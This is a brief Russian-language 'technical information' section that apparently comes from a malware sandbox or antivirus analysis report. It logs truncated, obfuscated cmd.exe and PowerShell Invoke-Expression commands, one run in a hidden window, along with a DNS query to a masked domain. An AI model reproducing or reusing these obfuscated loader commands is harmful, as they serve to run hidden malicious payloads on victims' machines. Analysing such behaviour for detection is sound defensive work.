Техническая информация
- '<SYSTEM32>\cmd.exe' RskuVmsM DLaLhCbnjoQqIPKpNNH lncAPhM & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HAOrijSaMXjaPqV%=KXfowjOWzNjlt&&set %LwKNhUkhP%=p&&set %hUdVaqNbnuLz%=o^w&&se...
- DNS ASK qw######duasndwjd212.com
- '<SYSTEM32>\cmd.exe' RskuVmsM DLaLhCbnjoQqIPKpNNH lncAPhM & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HAOrijSaMXjaPqV%=KXfowjOWzNjlt&&set %LwKNhUkhP%=p&&set %hUdVaqNbnuLz%=o^w&&se...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " .('iNvoK'+'e-ExP'+'ReSSi'+'ON') ( ( [RUNTIMe.iNtErOpsERvices.marshaL]::([ruNtiMe.interopsErvIceS.mARshAl].geTmemBErs()[3].Name).iNvokE( [rUNTimE.inTEROPSERvICes.MaRSHAl]::securEstriNgTobStR($...